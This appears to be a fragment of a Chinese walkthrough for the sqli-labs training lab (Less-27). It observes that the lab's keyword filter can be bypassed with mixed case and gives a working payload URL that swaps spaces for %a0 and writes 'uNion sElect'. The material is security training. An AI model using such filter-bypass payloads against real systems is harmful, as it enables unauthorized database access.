看一下过滤函数
看一下/s是什么东西
那直接通过大小写就可以绕过了
http://192.168.136.128/sqli-labs-master/Less-27/?id=0'%a0uNion%a0sElect%a01,2,%273